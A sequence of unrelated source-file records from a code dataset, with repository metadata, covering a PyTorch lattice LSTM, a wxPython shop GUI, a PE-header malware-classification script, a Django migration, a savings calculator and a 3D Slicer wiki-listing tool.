alpha = torch.div(alpha, alpha_sum)
merge_i_c = torch.cat([g.unsqueeze(0), c_input_var.transpose(1,0)],0)
c_1 = merge_i_c * alpha
c_1 = c_1.sum(0)
h_1 = o * torch.tanh(c_1)
return h_1, c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class LatticeLSTM(nn.Module):
"""A module that runs multiple steps of LSTM."""
def __init__(self, input_dim, hidden_dim, word_drop, word_alphabet_size, word_emb_dim, gaz_embedder, left2right=True):
super(LatticeLSTM, self).__init__()
skip_direction = "forward" if left2right else "backward"
print("build LatticeLSTM... ", skip_direction, " gaz drop:", word_drop)
self.hidden_dim = hidden_dim
self.word_emb = gaz_embedder
self.word_dropout = nn.Dropout(word_drop)
self.rnn = MultiInputLSTMCell(input_dim, hidden_dim)
self.word_rnn = WordLSTMCell(word_emb_dim, hidden_dim)
self.left2right = left2right
self.rnn = self.rnn.cuda()
self.word_emb = self.word_emb.cuda()
self.word_dropout = self.word_dropout.cuda()
self.word_rnn = self.word_rnn.cuda()
print("build LatticeLSTM End... ")
def forward(self, input_, lattice_input, hidden):
"""
input_: variable (batch, seq_len), batch = 1
skip_input_list: [skip_input, volatile_flag]
skip_input: three dimension list, with length is seq_len. Each element is a list of matched word id and its length.
example: [[], [[25,13],[2,3]]] 25/13 is word id, 2,3 is word length .
"""
seq_len = input_.size(0)
batch_size = input_.size(1)
hidden_out = []
memory_out = []
(hx,cx)= hidden
hx = hx.squeeze(0).cuda()
cx = cx.squeeze(0).cuda()
id_list = list(range(seq_len))
input_c_list = init_list_of_objects(seq_len, batch_size)
for t in id_list:
(hx,cx) = self.rnn(input_[t], input_c_list[t], (hx,cx))
hidden_out.append(hx.unsqueeze(0))
memory_out.append(cx.unsqueeze(0))
word_embs = self.word_emb(autograd.Variable(torch.LongTensor(lattice_input[t])))
word_embs = self.word_dropout(word_embs)
ct = self.word_rnn(word_embs, (hx,cx))
for i in range(batch_size):
if t+1 < seq_len:
if lattice_input[t][i][0] == 0:
input_c_list[t+1][i].append(torch.zeros_like(ct[i,0,:]))
else:
input_c_list[t+1][i].append(ct[i,0,:])
if t+2 < seq_len:
if lattice_input[t][i][1] == 0:
input_c_list[t+2][i].append(torch.zeros_like(ct[i,1,:]))
else:
input_c_list[t+2][i].append(ct[i,1,:])
if t+3 < seq_len:
if lattice_input[t][i][2] == 0:
input_c_list[t+3][i].append(torch.zeros_like(ct[i,2,:]))
else:
input_c_list[t+3][i].append(ct[i,2,:])
output_hidden, output_memory = torch.cat(hidden_out, 0), torch.cat(memory_out, 0)
return output_hidden, (output_hidden[-1,:,:], output_memory[-1,:,:])
def init_list_of_objects(size, bsz):
list_of_objects = list()
for i in range(0,size):
list_of_objects.append( [list() for i in range(bsz)] )
return list_of_objects
|
[
"yile.wangy@gmail.com"
] |
yile.wangy@gmail.com
|
0ad87734c9f80419af621baefc87786b066dc899
|
f6194828921cc952234253310a8ddd049893914c
|
/views/MainFrame.py.bak
|
873c5b369d0b46621490564a7d7a53bcaabff466
|
[] |
no_license
|
francom77/dress
|
5b3db0457230016a391187aee1df09123dfca69a
|
b315024751fb231b3a0c367eacb5172e89eb046b
|
refs/heads/master
| 2021-01-15T19:44:15.868685
| 2013-05-25T18:33:55
| 2013-05-25T18:33:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,220
|
bak
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# generated by wxGlade HG on Thu Mar 14 17:01:31 2013
import wx
# begin wxGlade: extracode
# end wxGlade
class MainFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MainFrame.__init__
kwds["style"] = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.MAXIMIZE|wx.MAXIMIZE_BOX|wx.SYSTEM_MENU|wx.RESIZE_BORDER|wx.CLIP_CHILDREN
wx.Frame.__init__(self, *args, **kwds)
# Menu Bar
self.frame_1_menubar = wx.MenuBar()
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Archivo")
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Editar")
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Ver")
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Ayuda")
self.SetMenuBar(self.frame_1_menubar)
# Menu Bar end
self.panel_1 = wx.Panel(self, -1)
self.btn_detalle_prendas = wx.Notebook(self.panel_1, -1, style=0)
self.notebook_1_pane_1 = wx.Panel(self.btn_detalle_prendas, -1)
self.texto_buscar_prendas = wx.TextCtrl(self.notebook_1_pane_1, -1, "Buscar...")
self.radio_btn_1 = wx.RadioButton(self.notebook_1_pane_1, -1, "Codigo", style=wx.RB_GROUP)
self.radio_btn_2 = wx.RadioButton(self.notebook_1_pane_1, -1, "Nombre", style=wx.RB_GROUP)
self.lista_prendas = wx.ListCtrl(self.notebook_1_pane_1, -1, style=wx.LC_REPORT|wx.SUNKEN_BORDER)
self.button_1 = wx.Button(self.notebook_1_pane_1, -1, "&Detalle")
self.btn_eliminar_prendas = wx.Button(self.notebook_1_pane_1, -1, "&Eliminar")
self.btn_nuevo_prendas = wx.Button(self.notebook_1_pane_1, -1, "&Nuevo")
self.button_5 = wx.Button(self.notebook_1_pane_1, -1, "Realizar &Venta")
self.notebook_1_pane_2 = wx.Panel(self.btn_detalle_prendas, -1)
self.texto_buscar_clientes = wx.TextCtrl(self.notebook_1_pane_2, -1, "Buscar...")
self.radio_btn_1_copy = wx.RadioButton(self.notebook_1_pane_2, -1, "DNI", style=wx.RB_GROUP)
self.radio_btn_2_copy = wx.RadioButton(self.notebook_1_pane_2, -1, "Nombre", style=wx.RB_GROUP)
self.lista_clientes = wx.ListCtrl(self.notebook_1_pane_2, -1, style=wx.LC_REPORT|wx.SUNKEN_BORDER)
self.btn_detalle_clientes = wx.Button(self.notebook_1_pane_2, -1, "&Detalle")
self.btn_eliminar_clientes = wx.Button(self.notebook_1_pane_2, -1, "&Eliminar")
self.btn_nuevo_clientes = wx.Button(self.notebook_1_pane_2, -1, "&Nuevo")
self.__set_properties()
self.__do_layout()
# end wxGlade
def __set_properties(self):
# begin wxGlade: MainFrame.__set_properties
self.SetTitle("Dress")
self.SetSize((803, 500))
self.SetFocus()
self.texto_buscar_prendas.SetMinSize((250, 22))
self.button_1.SetDefault()
self.texto_buscar_clientes.SetMinSize((250, 22))
self.btn_detalle_clientes.SetDefault()
# end wxGlade
def __do_layout(self):
# begin wxGlade: MainFrame.__do_layout
sizer_1 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.VERTICAL)
sizer_3_copy = wx.BoxSizer(wx.VERTICAL)
sizer_6_copy = wx.BoxSizer(wx.HORIZONTAL)
sizer_7_copy = wx.BoxSizer(wx.VERTICAL)
sizer_4_copy = wx.BoxSizer(wx.HORIZONTAL)
sizer_5_copy = wx.BoxSizer(wx.HORIZONTAL)
sizer_3 = wx.BoxSizer(wx.VERTICAL)
sizer_8 = wx.BoxSizer(wx.HORIZONTAL)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_7 = wx.BoxSizer(wx.VERTICAL)
sizer_4 = wx.BoxSizer(wx.HORIZONTAL)
sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
sizer_4.Add(self.texto_buscar_prendas, 0, wx.ALL|wx.ADJUST_MINSIZE, 10)
sizer_5.Add(self.radio_btn_1, 0, wx.RIGHT|wx.EXPAND|wx.ADJUST_MINSIZE, 20)
sizer_5.Add(self.radio_btn_2, 0, wx.ALIGN_CENTER_VERTICAL|wx.ADJUST_MINSIZE, 0)
sizer_4.Add(sizer_5, 1, wx.LEFT|wx.EXPAND, 20)
sizer_3.Add(sizer_4, 0, wx.EXPAND, 0)
sizer_6.Add(self.lista_prendas, 1, wx.LEFT|wx.RIGHT|wx.EXPAND|wx.ALIGN_RIGHT, 10)
sizer_7.Add(self.button_1, 0, wx.ADJUST_MINSIZE, 0)
sizer_7.Add(self.btn_eliminar_prendas, 0, wx.ADJUST_MINSIZE, 0)
sizer_7.Add(self.btn_nuevo_prendas, 0, wx.ADJUST_MINSIZE, 0)
sizer_6.Add(sizer_7, 0, wx.RIGHT, 10)
sizer_3.Add(sizer_6, 1, wx.EXPAND, 0)
sizer_8.Add(self.button_5, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ADJUST_MINSIZE, 10)
sizer_3.Add(sizer_8, 0, wx.ALIGN_RIGHT, 0)
self.notebook_1_pane_1.SetSizer(sizer_3)
sizer_4_copy.Add(self.texto_buscar_clientes, 0, wx.ALL|wx.ADJUST_MINSIZE, 10)
sizer_5_copy.Add(self.radio_btn_1_copy, 0, wx.RIGHT|wx.EXPAND|wx.ALIGN_CENTER_HORIZONTAL|wx.ADJUST_MINSIZE, 20)
sizer_5_copy.Add(self.radio_btn_2_copy, 0, wx.ALIGN_CENTER_VERTICAL|wx.ADJUST_MINSIZE, 0)
sizer_4_copy.Add(sizer_5_copy, 1, wx.LEFT|wx.EXPAND, 20)
sizer_3_copy.Add(sizer_4_copy, 0, wx.EXPAND, 0)
sizer_6_copy.Add(self.lista_clientes, 1, wx.LEFT|wx.RIGHT|wx.BOTTOM|wx.EXPAND|wx.ALIGN_RIGHT, 10)
sizer_7_copy.Add(self.btn_detalle_clientes, 0, wx.ADJUST_MINSIZE, 0)
sizer_7_copy.Add(self.btn_eliminar_clientes, 0, wx.ADJUST_MINSIZE, 0)
sizer_7_copy.Add(self.btn_nuevo_clientes, 0, wx.ADJUST_MINSIZE, 0)
sizer_6_copy.Add(sizer_7_copy, 0, wx.RIGHT, 10)
sizer_3_copy.Add(sizer_6_copy, 1, wx.EXPAND, 0)
self.notebook_1_pane_2.SetSizer(sizer_3_copy)
self.btn_detalle_prendas.AddPage(self.notebook_1_pane_1, "Prendas")
self.btn_detalle_prendas.AddPage(self.notebook_1_pane_2, "Clientes")
sizer_2.Add(self.btn_detalle_prendas, 1, wx.EXPAND, 0)
self.panel_1.SetSizer(sizer_2)
sizer_1.Add(self.panel_1, 1, wx.EXPAND, 0)
self.SetSizer(sizer_1)
self.Layout()
# end wxGlade
# end of class MainFrame
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
frame_1 = MainFrame(None, -1, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
|
[
"nicolas_maggione_27@hotmail.com"
] |
nicolas_maggione_27@hotmail.com
|
daeeb80b26acf9b019b2a16705f67b2858d3cd88
|
7269d0125a3a4536a3eea8efc6a63784b82b6161
|
/src/test.py
|
6789bf4a2d604efdf3af8fac7149588792315cc0
|
[] |
no_license
|
rrozario/Malware-Detection-
|
119e756f37bc590fd4e3f81b923e171e82a51f23
|
10e86bc560bf0562477ba04cd74cafbb795e6d2e
|
refs/heads/master
| 2022-08-12T04:23:36.668390
| 2020-05-14T23:10:18
| 2020-05-14T23:10:18
| 264,044,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,305
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 9 16:03:59 2018
@author: Ruchi
"""
# ##### Testing with unseen file
# Given any unseen test file, it's required to extract the characteristics of the given file.
#
# In order to test the model on an unseen file, it's required to extract the characteristics of the given file. Python's pefile.PE library is used to construct and build the feature vector and a ML model is used to predict the class for the given file based on the already trained model.
# In[ ]:
# %load malware_test.py
"""
this file extracts the required information of a given file using the library PE
"""
import pefile
import os
import array
import math
import pickle
from sklearn.externals import joblib
import sys
import argparse
def get_entropy(data):
if len(data) == 0:
return 0.0
occurences = array.array('L', [0]*256)
for x in data:
occurences[x if isinstance(x, int) else ord(x)] += 1
entropy = 0
for x in occurences:
if x:
p_x = float(x) / len(data)
entropy -= p_x*math.log(p_x, 2)
return entropy
def get_resources(pe):
"""Extract resources :
[entropy, size]"""
resources = []
if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
try:
for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
if hasattr(resource_type, 'directory'):
for resource_id in resource_type.directory.entries:
if hasattr(resource_id, 'directory'):
for resource_lang in resource_id.directory.entries:
data = pe.get_data(resource_lang.data.struct.OffsetToData, resource_lang.data.struct.Size)
size = resource_lang.data.struct.Size
entropy = get_entropy(data)
resources.append([entropy, size])
except Exception as e:
return resources
return resources
def get_version_info(pe):
"""Return version infos"""
res = {}
for fileinfo in pe.FileInfo:
if fileinfo.Key == 'StringFileInfo':
for st in fileinfo.StringTable:
for entry in list(st.entries.items()):
res[entry[0]] = entry[1]
if fileinfo.Key == 'VarFileInfo':
for var in fileinfo.Var:
res[list(var.entry.items())[0][0]] = list(var.entry.items())[0][1]
if hasattr(pe, 'VS_FIXEDFILEINFO'):
res['flags'] = pe.VS_FIXEDFILEINFO.FileFlags
res['os'] = pe.VS_FIXEDFILEINFO.FileOS
res['type'] = pe.VS_FIXEDFILEINFO.FileType
res['file_version'] = pe.VS_FIXEDFILEINFO.FileVersionLS
res['product_version'] = pe.VS_FIXEDFILEINFO.ProductVersionLS
res['signature'] = pe.VS_FIXEDFILEINFO.Signature
res['struct_version'] = pe.VS_FIXEDFILEINFO.StrucVersion
return res
#extract the info for a given file
def extract_infos(fpath):
res = {}
pe = pefile.PE(fpath)
res['Machine'] = pe.FILE_HEADER.Machine
res['SizeOfOptionalHeader'] = pe.FILE_HEADER.SizeOfOptionalHeader
res['Characteristics'] = pe.FILE_HEADER.Characteristics
res['MajorLinkerVersion'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
res['MinorLinkerVersion'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
res['SizeOfCode'] = pe.OPTIONAL_HEADER.SizeOfCode
res['SizeOfInitializedData'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
res['SizeOfUninitializedData'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
res['AddressOfEntryPoint'] = pe.OPTIONAL_HEADER.AddressOfEntryPoint
res['BaseOfCode'] = pe.OPTIONAL_HEADER.BaseOfCode
try:
res['BaseOfData'] = pe.OPTIONAL_HEADER.BaseOfData
except AttributeError:
res['BaseOfData'] = 0
res['ImageBase'] = pe.OPTIONAL_HEADER.ImageBase
res['SectionAlignment'] = pe.OPTIONAL_HEADER.SectionAlignment
res['FileAlignment'] = pe.OPTIONAL_HEADER.FileAlignment
res['MajorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
res['MinorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MinorOperatingSystemVersion
res['MajorImageVersion'] = pe.OPTIONAL_HEADER.MajorImageVersion
res['MinorImageVersion'] = pe.OPTIONAL_HEADER.MinorImageVersion
res['MajorSubsystemVersion'] = pe.OPTIONAL_HEADER.MajorSubsystemVersion
res['MinorSubsystemVersion'] = pe.OPTIONAL_HEADER.MinorSubsystemVersion
res['SizeOfImage'] = pe.OPTIONAL_HEADER.SizeOfImage
res['SizeOfHeaders'] = pe.OPTIONAL_HEADER.SizeOfHeaders
res['CheckSum'] = pe.OPTIONAL_HEADER.CheckSum
res['Subsystem'] = pe.OPTIONAL_HEADER.Subsystem
res['DllCharacteristics'] = pe.OPTIONAL_HEADER.DllCharacteristics
res['SizeOfStackReserve'] = pe.OPTIONAL_HEADER.SizeOfStackReserve
res['SizeOfStackCommit'] = pe.OPTIONAL_HEADER.SizeOfStackCommit
res['SizeOfHeapReserve'] = pe.OPTIONAL_HEADER.SizeOfHeapReserve
res['SizeOfHeapCommit'] = pe.OPTIONAL_HEADER.SizeOfHeapCommit
res['LoaderFlags'] = pe.OPTIONAL_HEADER.LoaderFlags
res['NumberOfRvaAndSizes'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
# Sections
res['SectionsNb'] = len(pe.sections)
entropy = [x.get_entropy() for x in pe.sections]
res['SectionsMeanEntropy'] = sum(entropy)/float(len(entropy))
res['SectionsMinEntropy'] = min(entropy)
res['SectionsMaxEntropy'] = max(entropy)
raw_sizes = [x.SizeOfRawData for x in pe.sections]
res['SectionsMeanRawsize'] = sum(raw_sizes)/float(len(raw_sizes))
res['SectionsMinRawsize'] = min(raw_sizes)
res['SectionsMaxRawsize'] = max(raw_sizes)
virtual_sizes = [x.Misc_VirtualSize for x in pe.sections]
res['SectionsMeanVirtualsize'] = sum(virtual_sizes)/float(len(virtual_sizes))
res['SectionsMinVirtualsize'] = min(virtual_sizes)
res['SectionMaxVirtualsize'] = max(virtual_sizes)
#Imports
try:
res['ImportsNbDLL'] = len(pe.DIRECTORY_ENTRY_IMPORT)
imports = sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])
res['ImportsNb'] = len(imports)
res['ImportsNbOrdinal'] = len([x for x in imports if x.name is None])
except AttributeError:
res['ImportsNbDLL'] = 0
res['ImportsNb'] = 0
res['ImportsNbOrdinal'] = 0
#Exports
try:
res['ExportNb'] = len(pe.DIRECTORY_ENTRY_EXPORT.symbols)
except AttributeError:
# No export
res['ExportNb'] = 0
#Resources
resources= get_resources(pe)
res['ResourcesNb'] = len(resources)
if len(resources)> 0:
entropy = [x[0] for x in resources]
res['ResourcesMeanEntropy'] = sum(entropy)/float(len(entropy))
res['ResourcesMinEntropy'] = min(entropy)
res['ResourcesMaxEntropy'] = max(entropy)
sizes = [x[1] for x in resources]
res['ResourcesMeanSize'] = sum(sizes)/float(len(sizes))
res['ResourcesMinSize'] = min(sizes)
res['ResourcesMaxSize'] = max(sizes)
else:
res['ResourcesNb'] = 0
res['ResourcesMeanEntropy'] = 0
res['ResourcesMinEntropy'] = 0
res['ResourcesMaxEntropy'] = 0
res['ResourcesMeanSize'] = 0
res['ResourcesMinSize'] = 0
res['ResourcesMaxSize'] = 0
# Load configuration size
try:
res['LoadConfigurationSize'] = pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size
except AttributeError:
res['LoadConfigurationSize'] = 0
# Version configuration size
try:
version_infos = get_version_info(pe)
res['VersionInformationSize'] = len(list(version_infos.keys()))
except AttributeError:
res['VersionInformationSize'] = 0
return res
if __name__ == '__main__':
clf = joblib.load('classifier/classifier.pkl')
features = pickle.loads(open(os.path.join('classifier/features.pkl'),'rb').read())
data = extract_infos("C:/Python27/python.exe")
pe_features = [data[x] for x in features]
res= clf.predict([pe_features])[0]
print(('The file %s is %s' % (os.path.basename("C:/Python27/python.exe"),['malicious', 'legitimate'][res])))
|
[
"noreply@github.com"
] |
rrozario.noreply@github.com
|
0937f7fd917adfe8973d1222e184e43f56b68640
|
c52e34a8f7b43028196fe3b385768d7648d06fb9
|
/app01/migrations/0003_answer_option.py
|
960eaa25168aed12b2048f668abae1d4eccf6f10
|
[] |
no_license
|
zhangyi89/questionnarie
|
421e43d3f141508e029dd29f81bc905ab54309fd
|
6386bdff6bb4fb43f2e3b91d90e6fe81c83c4bf4
|
refs/heads/master
| 2021-08-24T10:29:51.542142
| 2017-12-09T06:34:26
| 2017-12-09T06:34:26
| 113,381,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-09 04:39
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app01', '0002_question_questionnaire'),
]
operations = [
migrations.AddField(
model_name='answer',
name='option',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='app01.Option'),
),
]
|
[
"2369717781@qq.com"
] |
2369717781@qq.com
|
3a9ec1f9626739da8e8e1b4449f4770e65322b3e
|
3ab788022d09e10fd7f9751618a82c485441200f
|
/lectures/week03/lect1/ex3-savings.py
|
7a35b0eaacb4819a38a60bf29678765341ceda1b
|
[] |
no_license
|
nkmansou/15-112
|
d46f968b2b7a7d9a00da35f776f3e15b1a89f0f3
|
8917a86fde3f760f6392d959e931a1e59fbd3159
|
refs/heads/master
| 2020-04-15T13:13:41.959579
| 2015-03-10T15:53:24
| 2015-03-10T15:53:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# problem: I have 100,000 QAR on a saving account. Every year my bank gives me 2.5% interest on my savings. In addition, the bank offers me a bonus of 5,000 QAR every 5 years. How much will I have in 10 years? 20 years?
# input data
amount = 100000
interest = 2.5
# calculate interests
for i in range(20):
amount = amount * 1.025
if (((i+1) % 5) == 0):
amount = amount + 5000
# display the result
print "Result is: ", amount
|
[
"thierry.sans@gmail.com"
] |
thierry.sans@gmail.com
|
5c395d2a8330c4f6da772620bc61ad55dfe0d85f
|
e138bd85f7737b4793c2c1f10e682eb2106481e0
|
/slicer_wiki_extension_module_listing.py
|
01f6d57cc8818c945ca8c9f2f8bedf958fdfcaf6
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-3dslicer-1.0"
] |
permissive
|
Slicer/slicer-wiki-scripts
|
feef2e05562c1628d507ededd854abc04b44c22a
|
3655eb1cf1fde3995f553a414785bc1c69f6e087
|
refs/heads/master
| 2021-01-01T19:24:03.851023
| 2017-04-18T21:54:43
| 2017-04-18T21:54:43
| 28,377,113
| 0
| 4
| null | 2016-11-22T23:20:51
| 2014-12-23T04:26:16
|
Python
|
UTF-8
|
Python
| false
| false
| 71,479
|
py
|
#!/usr/bin/env python
import codecs
import ConfigParser
import fnmatch
import glob
import git
import io
import itertools
import json
import os
import platform
import re
import subprocess
import sys
import tempfile
import urllib
import urllib2
#---------------------------------------------------------------------------
# Module global variables
class ModuleGlobals(object): pass
__m = ModuleGlobals()
__m.persistent_cache_enabled = False
__m.persistent_cache = {}
__m.cache = {}
#---------------------------------------------------------------------------
def setCacheEntry(key, value):
__m.cache[key] = value
return value
#---------------------------------------------------------------------------
def cacheEntry(key):
return __m.cache[key]
#---------------------------------------------------------------------------
def clearCache():
__m.cache = {}
#---------------------------------------------------------------------------
def persistentCacheEnabled():
return __m.persistent_cache_enabled
#---------------------------------------------------------------------------
def setPersistentCacheEnabled(value):
__m.persistent_cache_enabled = value
#---------------------------------------------------------------------------
def persistentCacheEntry(key):
if persistentCacheEnabled():
return __m.persistent_cache[key]
else:
raise KeyError
#---------------------------------------------------------------------------
def setPersistentCacheEntry(key, value):
__m.persistent_cache[key] = value
savePersistentCache()
return value
#---------------------------------------------------------------------------
def clearPersistentCache():
__m.cache = {}
#---------------------------------------------------------------------------
def getPersistentCacheFilePath():
return os.path.join(tempfile.gettempdir(), os.path.basename(os.path.splitext(__file__)[0])+"-cache")
#---------------------------------------------------------------------------
def savePersistentCache():
with open(getPersistentCacheFilePath(), 'w') as fileContents:
fileContents.write(json.dumps(__m.persistent_cache, sort_keys=True, indent=4))
#---------------------------------------------------------------------------
def loadPersistentCache():
setPersistentCacheEnabled(True)
if not os.path.exists(getPersistentCacheFilePath()):
return
with open(getPersistentCacheFilePath()) as fileContents:
__m.persistent_cache = json.load(fileContents)
#---------------------------------------------------------------------------
def connectToSlicerWiki(username='UpdateBot', password=None):
"""
:param username:
Username to login to Slicer wiki. The user should be granted right to use the wiki API.
:type username:
:class:`basestring`
:param password:
Password to login to Slicer wiki.
:type username:
:class:`basestring`
:returns: Site object allowing to interact with the wiki.
:rtype: :class:`mwclient.Site <mwclient:mwclient.client.Site>`
"""
return connectToWiki(username, password, 'www.slicer.org', '/w/')
#---------------------------------------------------------------------------
def connectToWikiByName(name):
try:
wiki = cacheEntry('wiki-{0}'.format(name))
except KeyError:
username = cacheEntry("wiki-{0}-username".format(name))
password = cacheEntry("wiki-{0}-password".format(name))
host = cacheEntry("wiki-{0}-host".format(name))
path = cacheEntry("wiki-{0}-path".format(name))
wiki = setCacheEntry('wiki-{0}'.format(name),
connectToWiki(username, password, host, path))
return wiki
#---------------------------------------------------------------------------
def connectToWiki(username, password, host, path):
"""
:returns: Site object allowing to interact with the wiki.
:rtype: :class:`mwclient.Site <mwclient:mwclient.client.Site>`
"""
import mwclient
site = mwclient.Site(host, path=path)
site.login(username, password)
print("\nConnected to '{host}{path}' as user '{username}'".format(
host=site.host, path=site.path, username=username))
return site
#---------------------------------------------------------------------------
def convertTitleToWikiAnchor(title):
"""Convert section title into a identifier that can be used to reference
the section in link.
:param title:
Section title
:type title:
:class:`basestring`
:returns: Anchor that can be used to reference the associated section.
:rtype: :class:`basestring`
"""
# Following snippet has been adapted from mediawiki code base
# 1) normalize
title = re.sub(r'[ _]+', ' ', title)
# 2) See Title::newFromText in mediawiki
title = title.replace(' ', '_')
# * decodeCharReferencesAndNormalize: Convert things like é ā or 〗 into normalized text
# XXX title = decodeCharReferencesAndNormalize(title)
# * Strip Unicode bidi override characters.
title = re.sub(r'\xE2\x80[\x8E\x8F\xAA-\xAE]', '', title)
# * Clean up whitespace
# XXX title = re.sub(r'[ _\xA0\x{1680}\x{180E}\x{2000}-\x{200A}\x{2028}\x{2029}\x{202F}\x{205F}\x{3000}]', '_', title)
title = title.strip('_')
# 2) See Title::getFragmentForURL -> Title::escapeFragmentForURL -> Sanitized::escapeId
title = re.sub(r'[ \t\n\r\f_\'"&#%]', '_', title)
title = title.strip('_')
title = urllib.quote_plus(title)
# * HTML4-style escaping
title = title.replace('%3A', ':')
title = title.replace('%', '.')
return title
#---------------------------------------------------------------------------
def extractExtensionName(descriptionFile):
return os.path.basename(os.path.splitext(descriptionFile)[0])
#---------------------------------------------------------------------------
def prettify(name):
"""Source: http://stackoverflow.com/questions/5020906/python-convert-camel-case-to-space-delimited-using-regex-and-taking-acronyms-in
"""
name = re.sub(r'^Slicer(Extension)?[\-\_]', "", name)
#return re.sub("([a-z])([A-Z])","\g<1> \g<2>", name).replace('_', ' ')
return name
#---------------------------------------------------------------------------
def getDescriptionFiles(extensionsIndexDir, skip = []):
s4extFiles = []
files = os.listdir(extensionsIndexDir)
for descriptionFile in files:
if not fnmatch.fnmatch(descriptionFile, '*.s4ext'):
continue
if extractExtensionName(descriptionFile) in skip:
continue
s4extFiles.append(os.path.join(extensionsIndexDir, descriptionFile))
return s4extFiles
#---------------------------------------------------------------------------
def getExtensionHomepages(files):
import SlicerWizard as sw
print("\nCollecting extension homepage links")
homepages = {}
for file_ in files:
desc = sw.ExtensionDescription(filepath=file_)
name = extractExtensionName(file_)
homepages[name] = desc.homepage
return homepages
#---------------------------------------------------------------------------
def wikiPageExists(wikiName, page):
try:
exist = persistentCacheEntry(page)
except KeyError:
wiki = connectToWikiByName(wikiName)
exist = setPersistentCacheEntry(page, wiki.Pages[page].exists)
return exist
#---------------------------------------------------------------------------
WIKI_LINK_INTERNAL = 0
WIKI_LINK_EXTERNAL = 1
WIKI_LINK_OFF = 2
#---------------------------------------------------------------------------
def wikiPageToWikiLink(page, name=None):
if not name:
return "[[{}]]".format(page)
else:
return wikiPageToWikiLink("{0}|{1}".format(page, name))
#---------------------------------------------------------------------------
def urlToWikiLink(url, name):
return "[{0} {1}]".format(url, name)
#---------------------------------------------------------------------------
def _generateWikiLink(type_, what, name, linkName, url=None, slicerVersion=None):
if type_ == WIKI_LINK_INTERNAL:
if not slicerVersion:
raise RuntimeError, ("slicerVersion parameter is required when "
"specifying WIKI_LINK_INTERNAL wiki link type.")
release = getSlicerReleaseIdentifier(slicerVersion)
page = "Documentation/{release}/{what}/{name}".format(
release=release, what=what, name=name)
return wikiPageToWikiLink(page, linkName)
elif type_ == WIKI_LINK_EXTERNAL:
return urlToWikiLink(url, linkName)
else: # WIKI_LINK_OFF
return linkName
#---------------------------------------------------------------------------
def _createLinkItem(type_, what, name, linkName, url=None, slicerVersion=None):
return {'name' : name,
'wikilink' : _generateWikiLink(type_, what, name, linkName, url=url, slicerVersion=slicerVersion),
'type' : type_,
'url' : url}
#---------------------------------------------------------------------------
def generateItemWikiLinks(what, wikiName, homepages, slicerVersion=None):
if slicerVersion is None:
slicerVersion = getSlicerVersion(slicerBuildDir)
releaseIdentifier = getSlicerReleaseIdentifier(slicerVersion)
print("\nGenerating {0} wiki links for Slicer {1}:".format(what, releaseIdentifier))
wikiLinks = {}
for idx, (name, homepage) in enumerate(homepages.iteritems()):
if idx % 5 == 0:
print(" {:.0%}".format(float(idx) / len(homepages)))
item = _createLinkItem(WIKI_LINK_INTERNAL, what, name, prettify(name), slicerVersion=slicerVersion)
# If wiki page does NOT exist use the homepage link provided in the description file
if not wikiPageExists(wikiName, "Documentation/{0}/{1}/{2}".format(releaseIdentifier, what, name)):
if homepage:
item = _createLinkItem(WIKI_LINK_EXTERNAL, what, name, prettify(name), url=homepage)
else:
item = _createLinkItem(WIKI_LINK_OFF, what, name, prettify(name))
wikiLinks[name] = item
return wikiLinks
#---------------------------------------------------------------------------
def saveWikiPage(wikiName, name, summary, content):
wiki = connectToWikiByName(wikiName)
page = wiki.Pages[name]
return page.save(content, summary=summary)
#---------------------------------------------------------------------------
def getCategoryItems(itemCategories):
#----------------------------------------------------------------------
def _getParentCategory(category):
subModuleCategories = category.split('.')
parentCategory = subcategories
for subModuleCategory in subModuleCategories:
if subModuleCategory not in parentCategory:
parentCategory[subModuleCategory] = {}
parentCategory[subModuleCategory]['_ITEMS_'] = []
parentCategory = parentCategory[subModuleCategory]
return parentCategory
subcategories = {}
for name in itemCategories:
categories = ['Uncategorized']
if len(itemCategories[name]) > 0:
categories = itemCategories[name]
for category in categories:
# Skip empty category
if not category.strip():
continue
# Consider sub-categories
parentCategory = _getParentCategory(category)
parentCategory['_ITEMS_'].append(name)
return subcategories
#---------------------------------------------------------------------------
def getModuleCategories(modulesMetadata):
print("\nCollecting module 'categories'")
